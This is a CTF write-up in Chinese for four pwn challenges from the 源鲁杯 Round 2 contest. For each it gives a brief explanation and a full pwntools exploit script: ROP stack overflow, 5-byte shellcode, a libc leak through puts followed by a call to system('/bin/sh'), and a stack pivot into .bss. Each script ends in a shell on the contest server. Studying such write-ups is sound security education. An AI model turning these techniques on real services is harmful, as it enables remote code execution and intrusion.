源鲁杯ROUND2 Pwn题解
顾一莘 发表于 北京 CTF 315浏览 · 2024-10-18 19:23

ezstack2

栈溢出：先用 `pop rdi; ret` 把第一个参数设为 0x114514，再把返回地址劫持到 vuln 函数(0x400757)。链前多放一个 `ret` 通常是为了保持 16 字节栈对齐，避免后续 call 里的 movaps 崩溃。

from pwn import *

# Target setup: amd64 Linux, verbose tube logging, colored print helpers, connection.
context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'


def li(x):
    """Print *x* in orange (ANSI 256-color 214)."""
    print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')


def ll(x):
    """Print *x* in red (ANSI 256-color 1)."""
    print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')


# NOTE: debug = 1 selects the *remote* challenge, the opposite of the usual
# convention; set debug = 0 to run the local ./pwn instead.
debug = 1
r = remote('challenge.yuanloo.com', 47708) if debug else process(file_name)

elf = ELF(file_name)

def dbg():
    """Attach gdb to the current tube `r` (presumably meant for the local-process path, debug = 0)."""
    gdb.attach(target=r)

# Gadgets; the 0x40xxxx addresses indicate a non-PIE binary, so they are absolute.
pop_rdi_ret = 0x0000000000400823
ret = 0x000000000040056e

# Overflow layout: 0x38 bytes of padding up to the saved return address, then
# ret (presumably for 16-byte stack alignment -- confirm in gdb), pop rdi with
# 0x114514 as the first argument, and finally vuln at 0x400757 per the writeup.
pieces = [
    b'a' * 0x38,
    p64(ret),
    p64(pop_rdi_ret),
    p64(0x114514),
    p64(0x400757),
]
p = b''.join(pieces)
r.sendline(p)

r.interactive()

shortshell

rbx 中保存着一个与输入缓冲区相近的地址：用 `sub bl, imm8` 修正低字节偏移后 `jmp rbx` 跳回缓冲区执行，整个 shellcode 只有 5 字节。

from pwn import *

# Target setup: amd64 Linux, verbose tube logging, colored print helpers, connection.
context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'


def li(x):
    """Print *x* in orange (ANSI 256-color 214)."""
    print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')


def ll(x):
    """Print *x* in red (ANSI 256-color 1)."""
    print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')


# NOTE: debug = 1 means the *remote* challenge (inverted from the usual meaning).
debug = 1
if not debug:
    r = process(file_name)
else:
    r = remote('challenge.yuanloo.com', 27490)

elf = ELF(file_name)

def dbg():
    """Attach gdb to the tube `r` (presumably useful only with the local process, debug = 0)."""
    gdb.attach(target=r)

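# 5-byte shellcode. The bytes below disassemble to
#     80 eb 1c    sub bl, 0x1c
#     ff e3       jmp rbx
# NOTE: the original comment said `sub bl, 0x18`, but the encoded immediate is the
# third byte, 0x1c -- the comment was wrong, not the bytes. If the offset between
# rbx and the buffer changes, edit that third byte.
shellcode = b'\x80\xeb\x1c' + b'\xff\xe3'
p = shellcode
# send(), not sendline(): the buffer is executed as code, so do not append '\n'.
r.send(p)

r.interactive()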

canary

控制 main/gift 栈帧的 rbp（把它指到 `__stack_chk_fail@got + 0xa00` 附近的可写区域），利用 gift 读入长度较大这一点覆盖到 main 的返回地址：先用 puts(puts@got) 泄露 libc，再返回 system("/bin/sh")。

from pwn import *

# Target setup: amd64 Linux, verbose tube logging, colored print helpers, connection.
context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'


def li(x):
    """Print *x* in orange (ANSI 256-color 214)."""
    print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')


def ll(x):
    """Print *x* in red (ANSI 256-color 1)."""
    print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')


# NOTE: debug = 1 selects the *remote* challenge; 0 runs ./pwn locally.
debug = 1
r = remote('challenge.yuanloo.com', 37134) if debug else process(file_name)

elf = ELF(file_name)

def dbg():
    """Attach gdb to `r` (presumably intended for the local-process path, debug = 0)."""
    gdb.attach(target=r)

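# Addresses from the (non-PIE, 0x40xxxx) binary.
stack_check_fail = elf.got['__stack_chk_fail']
puts_plt = elf.plt['puts']
pop_rdi_ret = 0x00000000004013e3
puts_got = elf.got['puts']
ret = 0x000000000040101a

# Load the challenge libc before touching the target, so a missing/wrong path
# fails here instead of halfway through the exploit.
libc = ELF('./2.31/libc-2.31.so')

# Each round answers the "functions?" menu with 0 and then overwrites a saved
# rbp plus return address. The rbp values point into a writable area near
# __stack_chk_fail@got (+0xa00); 0x401296 / 0x401258 are the code addresses the
# writeup returns into (presumably in main / gift -- confirm in a disassembler).
r.sendlineafter(b'functions?', b'0')
p = p64(stack_check_fail + 0xa00 - 0x50) + p64(0x401296)
r.send(p)

r.sendlineafter(b'functions?', b'0')
p = p64(stack_check_fail + 0xa00 - 0x8) + p64(0x401258)
r.send(p)

# Stage 1: puts(puts@got) leaks a libc pointer, then return to 0x401296 for
# another round (the extra `ret` presumably keeps the stack 16-byte aligned).
p = p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(ret) + p64(0x401296)
r.send(p)

# Parse the leak: low 6 bytes of the first pointer whose top byte is 0x7f
# (a user-space libc address on x86-64).
leak = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = leak - libc.sym['puts']
li('libc_base = ' + hex(libc_base))
if libc_base & 0xfff:
    # libc is mmap'ed page-aligned; an unaligned base means the leak was misparsed
    # (wrong libc build or stray 0x7f byte in earlier output).
    ll('libc_base is not page-aligned -- leak parsing is probably wrong')

r.sendlineafter(b'functions?', b'0')
# 0x404a28 + 0x48: fixed writable address used as the final fake rbp -- not
# derived from anything visible here; taken as-is from the writeup.
p = p64(0x404a28 + 0x48) + p64(0x401258)
r.send(p)

# Stage 2: system("/bin/sh").
system = libc.sym['system'] + libc_base
bin_sh = next(libc.search(b'/bin/sh\x00')) + libc_base
p = p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
r.send(p)

r.interactive()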

magicread

栈迁移：溢出只能覆盖到 saved rbp 和返回地址，于是先把 rbp 指到 .bss，返回到 read 把真正的 ROP 链读进 .bss，再用 `leave; ret` 把 rsp 切换到 .bss 上执行；第一轮泄露 puts，第二轮调用 system("/bin/sh")。

from pwn import *

# Target setup: amd64 Linux, verbose tube logging, colored print helpers, connection.
context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'


def li(x):
    """Print *x* in orange (ANSI 256-color 214)."""
    print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')


def ll(x):
    """Print *x* in red (ANSI 256-color 1)."""
    print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')


# NOTE: debug = 1 selects the *remote* challenge (inverted naming); 0 runs ./pwn locally.
debug = 1
if not debug:
    r = process(file_name)
else:
    r = remote('challenge.yuanloo.com', 40862)

elf = ELF(file_name)

def dbg():
    """Attach gdb to the tube `r` (presumably meant for the local process, debug = 0)."""
    gdb.attach(target=r)

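# Stack pivot to .bss. The overflow reaches only saved rbp + return address, so
# each round first points rbp into .bss and returns into the read at 0x400675,
# which reads the real ROP chain into .bss; `leave; ret` then moves rsp there.
bss = 0x601a00
read = 0x400675            # address of the read call being re-entered (per writeup)
start = 0x400510           # _start: restart the program for the next round
pop_rdi_ret = 0x0000000000400723
leave_ret = 0x0000000000400691
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

# Load the challenge libc before talking to the target so a bad path fails early.
libc = ELF('./2.23_11.3/libc-2.23.so')


def _pivot_round(chain: bytes) -> None:
    """Send one overflow -> read-into-bss -> pivot cycle with `chain` as the ROP payload.

    First send: 0x40 bytes of padding, saved rbp = bss + 0x40, return into read.
    Second send: 0x20 bytes of padding, the 4-qword chain, then rbp = bss + 0x18
    and leave;ret so that rsp lands on the chain. The exact offsets (0x40, 0x18)
    are taken from the writeup -- confirm against the frame layout in gdb.
    """
    r.send(b'a' * 0x40 + p64(bss + 0x40) + p64(read))
    r.send(b'a' * 0x20 + chain + p64(bss + 0x18) + p64(leave_ret))


# Round 1: puts(puts@got) to leak libc, then back to _start.
_pivot_round(p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(start))

# Parse the leak: low 6 bytes of the first pointer whose top byte is 0x7f.
leak = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = leak - libc.sym['puts']
li('libc_base = ' + hex(libc_base))
if libc_base & 0xfff:
    # libc is mmap'ed page-aligned; an unaligned base means the leak was misparsed.
    ll('libc_base is not page-aligned -- leak parsing is probably wrong')

# Round 2: system("/bin/sh").
bin_sh = next(libc.search(b'/bin/sh\x00')) + libc_base
system = libc.sym['system'] + libc_base
_pivot_round(p64(pop_rdi_ret) + p64(bin_sh) + p64(system) + p64(start))

r.interactive()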